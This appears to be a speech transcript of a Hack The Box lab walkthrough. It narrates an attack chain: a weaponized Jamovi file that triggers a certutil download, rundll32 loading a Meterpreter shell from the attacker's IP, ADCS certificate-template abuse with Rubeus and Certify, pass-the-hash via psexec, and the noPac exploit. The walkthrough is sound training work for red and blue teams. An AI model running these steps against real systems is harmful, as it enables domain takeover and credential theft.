backwhack, tasks, backwhack, charlotte.dll. That's where we're saving it. And then immediately what we can do is call run dll32, Windows tasks, charlotte.dll, and then we pass in the special code that we got. So this code, you may notice this code has changed from the first time we ran it. That's because I had to reset and rerun the box multiple times to get to the stage. I just edited out all of that stuff. So all you're seeing is this. The bottom line is you just need to copy this code that was generated from charlotte.py and paste it in. So you can see I'm using rundil to run charlotte.dll with this random function name, which was generated from charlotte.py. Control-Shift-V, that looks good. We've got 1 space between that comma and the first character. Escape Shift-ZZ. Okay, so now we need to move this jQuery into the Charlotte directory. So cd Charlotte. There we go. Looks like jQuery's in there. And now we can set up our web server. Sudo python 3 listening on port 80. Nice. So now we just need to upload the poisoned OMV back to the share. So that will be this guy right here. We need to upload that back to the share that the user is interacting with, so that when they open the Jamovi application, we'll get an interpreter shell shoveled back to us. That's the goal here, right? And we can confirm that this file is in the right format. If we create a new directory, let's do a sudo make directory omv, cd omv, sudo copy what if into this current directory. We'll see that this is just a zip file. So technically we could unzip it. And we could take a look at some of these JSON files. A little bit hard to read, so let's pipe it to JQ. And in case you've never used JQ, or you're not familiar with what it is, it's very cool. It's kind of like grep and awk and sed for JSON files, right? So if you do sudo apt info JQ, you'll see this is a great way to play with text, specifically JSON data, right? So we definitely want JQ. You can see it's not installed. That's why it's red. So we can do sudo apt install JQ, tech y. And then when this installs, we'll just pipe cat to JQ dot, and we'll get our results prettified. So now you can see the various spreadsheet headers under the name attribute. And here is our malicious payload in this header right here, this field header. So that looks right. That is our IP. You can see 10.10.16.2, and that is the file we will attempt to retrieve when the user opens our maldoc. So if we wanted to, we could zip this all back up and then put it back on the share that the user is accessing. But since I copied it, we can just pull it from here, right? That's the file we need to send up. So we'll say cd documents, analytics, dir. The current what if file has a current timestamp and it's 2841 bytes. If we put whatif.omv, it'll try to grab this one and send it to the remote share. Now if we look at the file size, you can see it increased to 2882. So now it's there. Very, very cool. So I believe this file gets accessed every 5 minutes or so. So if we go back to, let's see, interpreter, we can just wait here. What we should see is a GET request for so this is the flow, right? The user opens up the weaponized maldoc in Jamovi, which triggers a HTTP GET request to jQuery.js via the reflected cross-site scripting vulnerability inside the header file. When jQuery.js is retrieved, it will then coerce the victim machine into running cert util to make another GET request to our server, pull down charlotte.dil, that is downloaded, to the C Windows tasks folder as charlotte.dil, and then immediately use rundil to execute this cryptic function, which will then return, or that is shovel a interpreter shell to the attacker, us, listening on port 4444. That's the flow of events. All right, so we just need to wait, really. So we'll come back in, I guess, a few minutes and wait to see if we did this right. There are a lot of steps, a lot of room for breakage, but I think we've established everything correctly. So let's see what happens. Okay, we should at least see the GET request. It's been about 5 minutes, maybe 6 minutes. Okay, so let's take a look at what could be going wrong. So we're not even getting the GET request. Let's do a dir here. So we definitely uploaded the file. You can see the byte size is different. And looks like it wasn't accessed. It hasn't been accessed since 1629. And well, we're clearly past that time. So it says if the box is stuck, maybe it needs to be reset, which could very well be a possibility here. So let's do that. Let's reset the box because I can't see anything else that's wrong except that this access time is not being updated. And this indicates to me that the script on the hack-to-box server that's supposed to emulate a user isn't actually checking in and working, right? So that's the reason why I'm going to reset the box. Let's try it again. All right, good, we're in. So let's go into that folder. All right, so there's the what if OMV, and the timestamp says 9:03. So I guess the time is all messed up, but why does it say? That's weird. Anyway, yeah, that's definitely not a current time. But let's try to upload our version of the script anyway. Okay, now it's showing a current timestamp. That's what we want. Flip back over to Charlotte and see if we get that call back. We'll wait about 5 minutes. All right, so you're seeing a connection reset by Pierre. It took about 15 minutes, but there was a GET request and a 404 was returned. You see, it actually did try to pull down jQuery.js. That was returned, but we got a 404 for Charlotte.dil. So let's see if we can figure out what's going on here. Yes, Charlotte.dil is not here. All right, so that is interesting. We should just run Charlotte again. And then before we set up our web server, we should make sure that the DIL is there. A lot of little steps, a lot of things you got to do in order to make sure that this works. All right, compiling Charlotte.dil. All right, so now we've got a new run DIL function. So I'm just going to copy this, Control-Shift-C. Make sure Charlotte.dil is here, and I don't see it. So you know what? That is interesting. You know, I bet it didn't create it because, no, we ran, no, we ran Python with sudo, so it should have write privileges. Why couldn't it write to the folder? There's something we're not seeing. Let's look at this folder's permissions. It's owned by Kali. Execute, execute, execute. Why is it saying it wrote Charlotte.dil, but it's not actually doing it? Python 3, maybe? Compiling Charlotte.dil. All right, so is it here? Let's copy that. No. I am truly flummoxed. truly flummoxed here. I don't know why it's not writing it. Now we could go into the code, sudo vim charlotte.dil. I mean, we shouldn't have to do this. Charlotte.dil. Okay. And here it's trying to run this command. So it's sending errors to dev null. So we could modify the script so that it doesn't write out to dev null, right? We can actually take this part off so that we get the verbose output. So we can see exactly what the heck is happening, because it's not saying compilation failed. Escape, Shift-ZZ, let's rerun this guy. I'm really curious to see what's happening here, because this definitely worked for me in all my tests. Oh, GC not found. Ah, okay, so something happened with our install where that wasn't found. So let's go ahead and install it again. Paste that in and let it run again. So that is really interesting. So do you guys see how we think through this methodically? You saw how I edited the script. This is perfect. This is going to be the best lecture ever, because you guys are seeing how I work through the problems. And that's really what I want you to see. I don't want everything to work smoothly. I mean, what benefit is that to you? How do you learn if everything works perfectly every time? You learn by watching, an expert go through the troubleshooting process, think through problems methodically, and come out with solutions. So this is really cool. So we'll let this install, and we'll come back when it's done. All right, that finished in about 40 seconds. Now let's go back and run charlotte.py. And this time, we'll get verbose output as it's being compiled. And we should see charlotte.dil in the current directory. Yep. So you can see mingw64 is writing out. I'm not seeing any error messages there. Let's go ahead and grab this. Control-Shift-C. ls charlotte.dil. Do we have it? We do. Yes. All right. Man, it took us a while to get here, but we are here. So now what we can do is edit the jQuery file. I'm going to press the end key, that is, to go to the end of this line. Press I to insert, and then Control-Shift-V to paste. Escape, Shift-ZZ, cat jQuery. That all looks good. And now let's fire up our web server. All right, and we'll give it another go. So let's see, where are we here? Analytics. All right, so I'm seeing 1728 was the last time it was accessed. So we'll just have to wait. Again, we'll have to wait, but that's how this works. And we'll come back once we get charlotte.dil. This time we should not get a 404 and everything should work together. All right, let's see what happens, guys. See you in a little bit. Yes, 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 yes. Yeah. What is this guy doing? Guys, it took me like 3 or 4 days, I think about a week to get to this point. You guys are watching this video and it's being done in like an hour. I don't know how long it's taken me to edit this thing. But it took me about a week to get to this point because there was always something that was wrong. Like, I'd have Charlotte in the wrong directory, or the web server wasn't listening, or the process, or the VM was corrupt, or had to reset it. There's so many different variables, so many different things, but hard work pays off. Persistence pays off even more. And when you get to the end of the rainbow, man, it looks nice, like really nice. It looks like a interpreter shell, right? Interpreter session is open. So we can see the GET request came in for jQuery.js 200. Bam. jQuery.js is like, yo, hook up cert util, make another GET request and pull down Charlotte, save it to tasks. There's a GET request, Charlotte gets pulled down. Then immediately run-dil runs Charlotte with this function call, which then shovels interpreter to us, the attacker, which was listening on port 4444 because of the beacon.bin, which we built with MSF Venom. And now we're here. It's golden, guys. And in the next lecture, we're jumping into exploration. I will see you there. See you in a little bit, guys. Peace. All right, you guys, so now we're making progress. We know we need to transfer tools to the victim environment in order to complete our action on objectives. And so it starts with certify and Rubius. Let's see how we can get these two. I'm just going to type Rubius. Always had difficulty spelling that word. R-E-U-B-U-S. Yeah, Rubius GitHub. Man, Google's so smart. It auto-completes it, man. It's kind of scary. All right, that is not what I wanted. I guess I misspelled it. There we go. That's it. Yeah, it's part of GhostPack. So let's see. How do we actually install this thing? So it doesn't really tell us the instructions for doing that. Definitely read up on it. This tool is really, really cool. And threat actors and malware authors alike are using it as part of their second stage payload. So it's definitely something worth understanding so you can build detections against it. Or if you're a red teamer so that you can try to evade defenses. But you can see there is a release. The point I was going to make a moment ago is that, yes, it's based on .NET. It's based on .NET 4. So even if we download this, if we try to transfer it to the victim network and they're not at .NET 4, we might run into issues. So the first thing we need to do is check the .NET version on the box. And so we can use a standard built-in query, reg query that is, and we can actually query the registry through the command line. So I can say HKeyLocal machine, software, Microsoft Net, framework, setup, NDP. And yes, we are at 4.0, so we can transfer that. Now, one of the easiest ways to transfer these tools over, especially from GhostPack, is to use the Sharp collection. So Sharp collection, GitHub. This is a collection of offensive C# tools that include the GhostPack and a few others. Now, if you're doing a real pen test, you're not going to want to download the Sharp collection. These are precompiled. And I mean, you don't just want to drop a precompiled binary onto a customer's network, right? That could be a resume generating event, especially if it's laced with malware. So you want to build from source, right? But since this is just a closed lab environment, it's perfectly fine to use that here. So we want the 4.0. Let's grab the any edition, right? So this will work for both x64 and x86. And look at all these tools, man. This is crazy. Look at all these guys. This is probably something worth just cloning into your repository. Let's just grab this whole thing because this looks just too delicious to pass up. I'm going to copy that. And let's see, create a new tab, cd opt. Let's put it in opt. Sudo git clone. Let's grab it. Grab the whole thing. And then we could just run git pull whenever we want to update it, right? Or pull down the latest update. So this is a really nice way to manage your offensive C# assemblies, as they're called, right? They're actually assemblies if they're written in .NET, not necessarily binaries, although they kind of perform the same way. All right, so do we have it? Sharp collection, git pull, sudo git pull. All right, so we are already up to date, but I just wanted to show you that's how you can update your repo, like after you pull it down locally. So we want to go into Net Framework 4.0 any. Yes. All right, man, look at all this goodness. Watson. We've got ThunderFox. I don't even know what that is. Sticky Notes extract. That probably extracts credentials from sticky notes, right? Rubius. Safety Cats. It's like Mimikatz, but a safer version. Sharp Chisel. I mean, there's so much good stuff here. Let's just go ahead and grab what we need, right? So certify. Do you guys see Rubius here? I'm sure you see it before me. And Rubius, yeah. Certify and Rubius. So I'll say sudo copy. Let's just go to the directory, right? Let's go where we want to go first. So let's go to Anubis. Sudo copy opt sharp collection net framework 4.0 any Rubius. Oops, always spell that wrong. Why is that word so hard for me to spell? All right, so we'll copy that here. And we'll also grab certify. All right, so we've got certify and we've got Rubius. Very nice. Now we just need to get PowerView and ADCS. PowerView, GitHub. Even though this repository is archived, it's still extremely useful. So don't let that throw you off. Oh, it's not new. Oh, it's archived. I can't use it. Nope, you still want to use it. Trust me, it still works. All right, so we've got the raw link. Let's grab this, copy, and let's just pull it down. Sudo wget, copy this script. That's how you do it. That kind of rhymes. All right, now we need ADCS, which is built on PowerView. So ADCS PowerView. Maybe it's ADCS PowerShell. GitHub. ADCS .ps1. I think that's it. Yeah, this is it, guys. So we'll grab this down, click raw. You see just a shortcut to PowerView's get domain object that retrieves root CAs from the default location, right? So that's why we needed PowerView, because ADCS is basically like an alias or a shortcut to it. All right, so we've got our files. ADCS, certify, PowerView, and Rubius. Now it's time to transfer this over. Do we still have our Meterpreter shell? Okay, we do. Can we exit this shell without exiting Meterpreter? Will it take us back to Meterpreter, or will it completely kill our shell? Yes, we're back to Meterpreter. All right, so I'm going to say upload home Kali HTB Anubis Rubius.exe, and we'll put it in Windows tasks. Let's see if this works. I'm going to copy it because I'm going to need to type a similar command multiple times. And this is MITRE Attack Technique ID T1105 Command and Control Ingress Tool Transfer. You see we got our first tool transferred to the victim. Let's go ahead and grab the next one. Certify. ADCS.ps1. And then finally, PowerView. Okay, so now we've got these tools here. Let's go ahead and load the PowerShell module. Let's see if I can tab complete this. Surprised it doesn't let me tab complete that. Help? I'm pretty sure there is a PowerShell module here. PowerShell module. Nope, that's not doing what I want. So let's just do load PowerShell. I'm not sure why it wasn't showing up in the help. Unknown command. PowerShell import. Yeah, it requires load PowerShell. Oh, that's because I put the underscore. Okay, load PowerShell. You know what? I bet if I just did this, load and tab complete. Yes, that's what I wanted. Okay, so we type load, we tab complete, and it shows us everything we can load. So we're going to pick PowerShell here. Load PowerShell, loading the PowerShell extension, success. That is what I love to see. PowerShell, tab complete. Okay, because I don't want to mess it up again. I think it's just PowerShell import. Yeah. Home, Kali, HTB. And I actually should have did it this way the first time. We just need to import PowerShell this way into memory. We didn't have to upload it the way we did last time. And then we can also do ADCS.ps1. Yes, all right, that's good. So it did get loaded. You can see the output from it. And let's see if we can run the .NET assembly now. PowerShell, execute, and let's try to execute certify. Certify.exe. It worked. Oh, I love it when stuff works. So let's see, find all enabled security certificates. We can use this tool to do that. Let's see if we can use the get ADCS template from PowerView. Name web. Just want to make sure we can get that web certificate. If this works, we know that we have our PowerShell script loaded successfully. Wait, you know what? Is that it? Yeah, it should be a attack. Yep, it did work. Okay, great, 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 great. Wow, that is a lot of output. But I bet this includes the web certificate. Yeah, here it is right here. Display name for the web certificate. Okay, so what we're going to do is we're going to take that certificate and we're going to change it to a client certificate. And then we're going to essentially create a smart card certificate for the administrator so we can log in without a smart card. Sounds crazy? I know. Don't worry. It's going to be a lot of fun. And I am going to, as always, walk you through step by step. I'll see you guys in a little bit. Okay? Peace. All right, you guys, so we have arrived. It's pwn time. That's the best way I can describe what is about to happen next. All right, so we are going to flip back over to Meterpreter. We've got our shell here. Let's get PowerShell working here. So I believe we can actually, let's just do this. Let's say shell. Good to get a standard Windows shell up. And can we just call PowerShell like this? Yes, we can. Okay. So let's do a get module list available. This is a standard PowerShell commandlet that lists all available modules that are accessible to us. You can actually see we have that Docker module, further corroborating that we were in a Docker container. And we have a few other modules available for us to access. Okay, let's do a git command type. Can I tab complete? I can't. Okay, commandlet. Commandlet, can I do that? All right, so these are all the commandlets that we have access to currently right now. And it actually shows you what module it exists in. Let's see if we can find PowerView. Git command module PowerView. Maybe it's case sensitive. I just typed the same thing. Wow. Power view. There we go. Nothing. Okay, so it says if it's not there, can we run get smart card certificate? Oh, you know what? I think that's because it's not in this session. It's in our Meterpreter session. Let's go back to Meterpreter. PowerShell execute, git module, PowerShell, let's see, PowerShell shell. Is that what I want? Maybe? Because I want the shell in the Meterpreter interactive session. Git command module power view. Interesting. Okay. Now, how do we get out of this? If I press Control C, I'm probably going to lose my shell, which is fine. Terminate channel, yes. Oh, good. It brought me back. Okay. So let's just try executing this. Let's say get help, get smart card certificate. All right. So we do have this commandlet. It does exist. And that's what I thought. Can I just try this? Git command module power view. Power view. I'm trying to figure out why it's not showing up. It's not showing there. Is it powerview.ps1? ADCS? It's just odd to me that it's not showing these PowerShell scripts that are in memory, even though it's presenting this get smart card certificate, which clearly came from the script we ran in memory, right? So it's weird. But this is the one we need. And if you look at the help file for this, we can see what it does. So get smart card certificate. This, by the way, this commandlet came from that ADCS PowerShell script that we launched into memory earlier, okay? But if you look at this, it allows you to get a smart card certificate from a Windows Enterprise Certificate Authority for a specified user account. How does it do that? Like, for example, the admin, right? It does this by rewriting an arbitrary certificate template. Remember, we have access to modify those templates, specifically the web template. So we rewrite an arbitrary certificate template that we, the executing user, has write access on. And this can be used as a method for domain-wide privilege escalation, as well as a long-term persistence mechanism. This script relies heavily on PowerView. Isn't that interesting? So this is what we can do, guys. We can say get smart card certificate. We can set the identity, which, let's see. Okay, this is not telling us the, oh wait, it does. Identity. Can we do like get full help? Let's see. Instead of get help, I'm going to type get help, and then I'm going to put the full flag at the end. Should give us more information. Yeah, so here you can see they put the identity of a domain admin or a privileged account. And then we just need to put in the template name, which in our case will be web. And then I think we just need to specify that there's going to be no smart card because we don't actually have a smart card. Instruct the script to use the default CSP during enrollment. This will result in a certificate being stored in the default user cert store and not on a smart card. Yeah, because we don't have a smart card. That's probably why this is not required, but it's optional. Okay, so let's do it. Let's do it. We're going to say PowerShell execute get smart card certificate. The identity will be administrator. The template name will be web, and we want no smart card. Will it work? Did we typo? Did we do this right? Okay, so we're getting an error about the user administrator not having the right user principal name, the UPN. So there's something going on with this user, this UPN. Let's look at the Diego Cruz. Oh, I guess I can't do that. Hit UID. Yeah, let's look at the Diego Cruz UPN. So if I do PowerShell execute, get AD user, identity, Diego Cruz. It should tell me, yes, the user principal name. Ah, look at that. wincorp.thm. As if this is probably, I'm guessing this is probably written for try hack me at first, THM, which is a different CTF framework. And then it was probably repurposed for hack the box, but Active Directory wasn't rebuilt. So we have legacy artifacts littered throughout the domain, and it's breaking some things, right? So what we could probably do is modify that ADCS script to, instead of using the user principal name field, which is broken, we can use a different field that also has a name, like SAM account name, because that value is correct. Diego Cruz is right. So maybe we can patch that script. Let's go to our local box. We'll say sudo vim ADCS, right? Let's do escape / and I'm just going to do a search for UPN. See. UPN. All right, here we go. Let's set that to SAM account name. Can we just do that? Escape, Shift ZZ. Let's go back to our shell. PowerShell import home Kali hack the box Anubis ADCS.ps1. So we just put the new script in, the patch script. Let's see if this works now. Operation timed out. I'll time you out. Operation failed. No, you will not fail me. What the crap? Why did it work on the 5th time? That's so weird, man. Computers continue to confuse and confound. Even people who've been doing this for a while, like me. All right, so moral of the story is don't give up. All right, so now what we can do is we can say PowerShell execute. And we want to get the certificate thumbprint so we can pass it to Rubius and get the NTLM hash that we can use to authenticate via psexec. All right, so if I say get child item, which is just a way of saying dir, and I can look in the cert provider. This is a PowerShell provider called cert. In other words, we can browse the certificate store as if it were a drive. That is a function of PowerShell. We can look in the current user specifically the my path, and say recurse. And look at this, we've got some thumbprints, guys. So now we can execute. Let's go ahead and save these. Control-Shift-C. We can say execute, and we want to run something. What do we want to run? We want to run a file. We want to run Rubius. So we can say tac-f file, and then we'll use tac-I to interact with the process after we run it. And then we'll use the tac-H to create the process hidden from view. So I'll say execute, tac-f, Windows, tasks, Rubius, tac-I, tac-H. Nice. All right, so we've got Rubius running. Now we just need to get that fingerprint and paste it in the argument list so that Rubius can use it to get the NTLM hash, right? Because there is an ask TGT that is an ask ticket granting ticket option here. Man, there's a lot of, man, it's really hard to read this, isn't it? Say ask TGT. Yeah, so if we run this, we can retrieve a ticket granting ticket by saying basically, you know, we could specify the user as administrator, put the certificate as a hash instead of the PFX, but literally we can pass in the hash. It doesn't show you that here, but we can. That is the certificate fingerprint. Actually, it's not really a hash. It's a fingerprint. And then we can also pass in get credentials, so we can get the NTLM hash that we can then pivot on and get a shell in this box via PSExec. So I know there's a couple steps, but let's do it. Let's do it. We can do this. So I'll go back here. And what I'll do, so I run Rubius with the tac-A because these are the arguments we want to pass in. And it's ask TGT. The user will be administrator. A certificate will be whatever hash we had. Let's try this one. Oh, let's try the first one. And then we will get credentials. Ah, it's doing something. Building up. Okay. Oh, wait, I see an NTLM hash. That is an NTLM hash. And it's for the administrator. Guys, we just created an NTLM hash for the administrator from a tampered certificate template. Isn't that cool? So now that we've got this, we can use crack map exec to make sure we can gain access. We can say crack map exec, SMB, put the IP in, we'll put the username as administrator. The hash is this right here. And we should get an orange pwned back, meaning that we have admin access with these credentials. This is just a way to verify that we can use this hash with PSExec, and you can see we can't pwned. All right, guys, let's do it. Sudo psexec.py. If you do the H command, you can see for the help, you can actually type tac-H for hashes, and then you can put the lm hash : int hash in this format, or you can just do a : int hash. And then you specify the target, which is in this format here. So I know this is kind of confusing. So what I'm going to do is I'm going to split the pane. I want to show you guys how I build this out, because PSExec used to confuse me when I was just learning how to use it. The syntax, that is. So sudo psexec.py hashes. And now what we're going to do is put it in this format, leaving off the lm hash, just leaving the int hash. Then for the target, this is not optional, that's why it's not in brackets. The target has to follow this format. So domain is optional, username isn't. This @ is not optional, although it is showing it in brackets, but you do actually need that. And then we need to put the IP address of the target. Let's see, are we going to get a shell? Are we going to get a system shell? We are in system 32, guys. And now I realize I shouldn't have pressed DIR. I really want to do who am I. Let's close that, run this again. And this time I'll just run who am I. And we'll see all these artifacts that we left behind too when we look at our post-compromise assessment. Look at all these services. This is noisy. Who am I? We're a system. IPconfig, and we are outside of the container, as evidenced by the IP. There you go, guys. So we popped the box. You did it. You rock. The next lecture, we are going to get into an alternative path for popping. It's using the no-pack CVE. I'll see you guys in a little bit. Peace. All right, you guys, so now we're going to jump into another method of exploitation. And this is really, really cool. It's called the no-pack, no-PAC, right? So let's go ahead and close the shell and get out of Meterpreter. Goodbye, Meterpreter. It was fun knowing you. All right, let's see. Well, we've got a lot of them over here, don't we? All right, so let's get into this. Let's open up our good friend Google. I'm going to try to help you understand what this exploit does and how it works. So let's just type the CVE number in here, CVE 2021 42278, and we can type Fortinet. These are the security researchers that discovered this vulnerability and posted an explanation. So you can see FortiGuard Labs, the threat research team, discovered a critical vulnerability that allows an unprivileged user to escalate privileges to the domain administrator account. And it's basically achieved by chaining together these two CVEs. The first CVE, the 42278, is the invalid computer account name. And the second one is the Kerberos Key Distribution Center confusion. So let me try to help you understand what this is. So basically it comes down to the fact that machine accounts, so computers actually have accounts in Active Directory. Users have accounts, but the computer itself has an account, and those accounts end with a $sign, okay? But if the operating system doesn't enforce removing the $sign from the machine accounts, then you can come up with an invalid computer account name. So on vulnerable machines, you can actually rename the computer account by modifying an attribute called the SAM account name. And here you can see the computer account was test$12, and this user has the ability to modify that SAM account name value such that the dollar is no longer at the end of the name. And this can lead to very bad things happening. Okay, so just keep that in mind. And then there's this thing called the service principal names, or SPINs, as they're called. And this is just a way to link service account logons to a particular service. It's basically like a unique name or unique identifier for that service, and it's in this format. Now, this key distribution center, this guy is basically in charge of handling all the Kerberos tickets, right? So in an Active Directory environment, you use Kerberos, and there's a ticket granting ticket. That's a ticket that grants you access to get another ticket. And this is usually sent to a ticket granting service, a TGS, whenever the user is requesting a specific resource inside of the domain, like a file share or a printer or something like that. So the interesting thing is if the requested resource isn't found, right? If you try to request something that doesn't exist, then the key distribution center under this CVE will automatically try to look up the requested ticket name, but appended with a $sign. Okay, so this $sign is creeping back up again. So when you chain these two behaviors together, right, in isolation it may not be that bad, but when you chain them together, you can create an attack chain where by default, a standard user can actually create computer accounts. So the attacker can actually create this computer account. They can create their own, They can clear out that SPN value, that service principal name, and then they can change the SAM account name to any name they want, an arbitrary name, right? So when they request a ticket granting ticket for that computer account, they then flip the computer account name so it won't be found when the KDC looks for it. And this results in an interesting chain of behaviors where the attacker is able to create a service ticket for the service and then impersonate the administrator in the entire attack chain. So this is a really deadly exploit. And there are patches now, of course, it's not new. But I want to show you how this works because it's really fun to pull off and incredibly quick. So if we type NOPAC, GitHub, here we go, I think this is it. We can run this exploit. You can see there are some arguments here, positional arguments. And I'm going to show you guys how you can use this. Actually, if you scroll down to the bottom, you can see there's an option for auto get shell. So we will copy this and then we'll modify the values a little bit. Once, of course, we clone the repo. I copied it before I cloned the repo. So let's go ahead and do that first. Let's git clone it. Sudo git clone cd nopac. And let's see here. Auto get shell. So this was the original command. So we need to modify a few things, right? Let's go ahead and split the pane. And let's see if we can figure out how to craft this. What's going on here? Is it Python 3? Yes, it was. Okay, let's look at the help so we can figure out how to build this out. All right, usage in NOPAC. So the first thing I'm seeing is the domain, and it looks like a user account. Domain username, account used to authenticate to the domain controller. So we have an account for that, right? We've got, first of all, let's put the domain in here. This is windcorp.htb. And the account we have credentials for is the local admin. And we have the credentials secret 123. All right, the DC IP, let's update that, of course. Now the DC IP, this is that internal IP on the 172 network. So we need to make sure we put the right one there. We'll come back to that in a second. The host, we know that was Earth. That was the host name. And we can say shell impersonate administrator. So that DC IP, we need to get that. And that means we're going to have to use proxy chains, right, to set this all up. So let's get our shell back. All right, so there's our payload. Let's make sure we're listening with our web server. Sudo python 3, set that server up. Send the malicious payload, catch our shell and netcat, and then we'll get the IP address, IP config, and I'm seeing 172.21.128.1. Okay, let's put that here. And then we need to send this whole thing through proxy chains. We need to use Python 3, as we learned earlier. Let's run it with sudo. Now we can start that server again. And let's set up our chisel. Right, we've got that listening. go back here and run our command to pull down chisel, which we should actually already have in this directory, now that I think about it. Okay, maybe we don't. Let's pull it down again. And let's start the chisel client to get that tunnel set up. Now you can see we are listening on 1080, and the proxy tunnel is established in session 1. So now we should be able to run the above command to get domain admin on the box. It's trying. Control AZ, let's see what happens. You can see it creating the machine account with this particular password. I like it how it prints out every step that it's doing. Clock skewed to great. Okay, I'm glad this happened because I want to show you guys how we can fix this problem. This is a common issue that you'll experience whenever you're running Active Directory exploits. The time has to be synchronized between the Key Distribution Center, the KDC, which is the domain controller in most cases, and the connecting clients. So now there's a couple of things we can do. First of all, let me show you the correct way to do this, because you're going to want to disable NTP. If Network Time Protocol service is listening on the attacker machine, every time you change the time to match the victim, NTP will just resync the time for your local time and everything will get messed up. So you can use time date CTL to take a look at the time here. We can see that NTP is active. That's not what we want. Okay, we need to turn that off. So I'm going to set NTP to off. Then I'm going to rerun time date CTL, and you can see now NTP is inactive. If that didn't work, you could run sudo apt remove NTP tac-y. That's kind of aggressive, but that is a way around it. So now what we can do is get the date from the server. How do we do that? We can use curl, right? I can actually run curl against this domain. I'm doing -i, so I just get the header response. K is so that I suppress the certificate issues. And here you can see the date is returned right here, right? So let's just go ahead and use some bash foo to grep out the line that starts, that's what this caret means, starts with date. Okay, there you go, you can see it right there. And actually I am going to do a -s to make it quiet. It's a lot cleaner with the output, right? And then I can say, all right, I want to cut and use a delimiter of a space. And using a space as a delimiter, I'll cut the second field, but the second field and then everything to the end. So I can say -F2 for the second field and then the dash at the end to go to the end. All right, sweet. So now we've got that date format. And now what we can do is take this entire thing, put it in parentheses, and I can turn it into a command, or really an argument that I'm passing to the date command. I'm setting the date to the result of this expression being computed. So the date on my Kali box will be set to the header that's parsed from the server. So I know my local time will match the server time. All right, so now we run date, and you can see our date on the local machine is the same pretty much as the date on this server. So now we can rerun. Let's see, we can rerun our script. Let's see if we can get our access now. This is looking good. We got further. Wait a second. Ah, yes. Okay, we've got a shell. Who am I? Who am I? We are system. ipconfig the reason I'm running ipconfig is to check to make sure we're not in the container, and we aren't, because you can see we have access to Ethernet 2, which is the IP address we're attacking. There you go, guys. That is a second mechanism for achieving really root, I guess you could call it, but for completely taking over the domain controller with a CVE. So make sure you patch your systems so that attackers can't do attacks like this. All right, so in the next lecture, what we're going to do is do a little post-pop exploration. We're going to enable RDP, perform a bunch of MITRE attack techniques, and then we're going to look at source code review, log review. We're going to look at the artifacts we left behind. It's going to be a lot of fun, and it's going to be a great learning experience for both blue and red teamers. I'll see you guys in a little bit, all right? Peace. All right, so let's look at the vulnerability that made this initial intrusion possible. Close out all of these Jamovi launches. I just closed them all out. Let's see. Close all windows. So you see, this is actually the Jamovi the script that emulates a user opening up the application. Charlotte. All right. Whoa, not a valid Win32 application. So look at that. We got some errors there, but we still got our interpreter shell. Okay, so let's just start with the vulnerability that made the initial intrusion vector and ultimately domain domination possible. So let's go into this C folder, and we want to go to the web root, which is usually inetpub for IIS, and we see the web root folder here. So now this is the default web application. So let's open this with Notepad. So here you can see the application starts with these ASP tags, right? So I just want to reiterate, this is a ASP script, right? If I go to View, File Name Extensions, you can see it's default ASP. It's an ASP file. And it starts with these ASP tags, and we have a variable called IP. And how is it getting assigned? Well, the trim function is called. It's just pulling in the remote address from the GET request and assigning that to the IP. There's no sanitization being done here. So what we can do to find out where this value is being used is just do a Control F IP. Let's see. There we go. So here on the software portal, this is how we were able to capture credentials. You can see this value is concatenated. It's directly concatenated into the download string, right? So this is the hard-coded address on both sides, right here. And then our variable, which is accepting untrusted user input, is directly concatenated. Therefore, the attacker was able to modify this IP, change it from, oh, wait a second. Yes, this IP actually wasn't the attacker's IP. It was the IP of the system that this should have been installed onto. Yes, so now I remember, it's been so far back. So that IP address was actually the IP of an internal system in the victim network, and we were able to change it because this value doesn't have any strict enforcements around it. So this is the software portal application here. Is there like an index.asp? Installed ASP, I don't know what this is. Oh, this is probably the script that loads when you try to install it. Creates this task file. Okay. Yeah, the software portal installation script. But what is a little bit befuddling to me is, let's go back to our Kali box. Whoa, not to the task manager. Let's go back here. Here we go. If we go to, so we know that we have a source code for this page, right? This page right here. But what about this page, the wincorp.htb site? Where's this being located? because this was our initial intrusion vector, right? We were able to essentially get in through the unsanitized form field and the contact form. Right here. So where's this? Could be in the IIS portal. So if we go to the server manager, yeah, I believe there's an IIS portal in here. Diego Cruz, secret 123. Yeah, there we go. IIS role is installed, so we should be able to look at the sites here. Let's open the IIS manager. Ah, here we go. I think this is what I wanted. Okay, so we've got Earth, got application pools, default pool, and we have an enrollment pool. Okay, let's see what sites we have. We just have the default website, directory browsing. Okay. Let's see, explore. Okay, that's the certificate enrollment services. We can see the logging levels, log file only, the logs roll daily. I just changed that. Yeah, the logs roll daily. And it looks like they log out here. So let's see if we can take a look at these logs. Probably not that way. Let's go to view log files. Access denied. Okay. Okay, let's try to view them a different way. Let's see, inetpub logs. Inetpub logs. Let's log in. Diego Cruz. All right, so we've got a few failed login requests. Okay, nothing's in there. What about log files? Okay, good. We have a few logs in here. Let's look at the most recent one. And let's see what we notice. Not much. It looks like the log probably got rolled. So one thing we could do, and this is what I'm going to do. I think this will be fun. Let's go back to the portal. Right here. And we're just going to run the attack, like the shell. Sudo nc nvlp 443. Let's get that going real quick. Drop in the payload. Just want to see if this attack is logged, right? I mean, that's basically what we're trying to do. All right, so let's see. Refresh the timestamp here. Nothing got updated from what I can see. Actually, these logs are old. This is 2021. Yeah, this wasn't generated this year. Are the logs not being logged? That's even worse. Okay. Well, it looks like we don't have any logs. Maybe it's in that config file in the web root. Yeah, the web config. Maybe that'll tell us. No. Okay, so it just occurred to me we might be able to find what we want inside the container because we're not inside the container here. Right? If I open up a command prompt and I say run as administrator, I type ipconfig, you can see we're on the host. So we need to get into Docker because I think Docker exists on this box. Let's see, Docker. Yes, so we do have Docker installed. And you can see all the commands we can run. So we can say Docker images to list out the Docker images. And we do see that web server image. Great. Okay, so we can list the running containers with Docker PS. we see this container ID right here is running. So if we do docker exec, and then we can interact with that container by pasting in the ID and typing the process we want to launch when it runs. This should spawn a command prompt inside the web server 01 container. Will it work? Oh, we did something. ipconfig. Yes, we are inside of the container. Very cool. So now I'm sure we have logs. So we can go to cd inet pub dir cd www root. And yeah, we can look at all the files here. So which one is the contact form? So let's see, can we just copy all these files out of here from this container? That's what I'm going to try to do. So let's exit the container. We're on the host now. And let's say docker copy, and there's the path. We need to put that container ID in. So actually, let's do this. Let's say docker ps. Now we have the container ID right here. We can say docker copy, grab that container ID. All right, that looks right. And we'll put it in this folder on our host box. Did it work? That was kind of fast. I didn't get any error messages. Oh yes, I think it worked. Very cool. Okay, this is great. So now we can actually read these pages. Which one do we want to look at? Let's look at this guy. Open with Notepad. Let's see if there's any ASP. It's hard to find the ASP opening tag in here. Let's just look for any percents. So this looks like a static HTML page. Hey, there's my, okay, so there 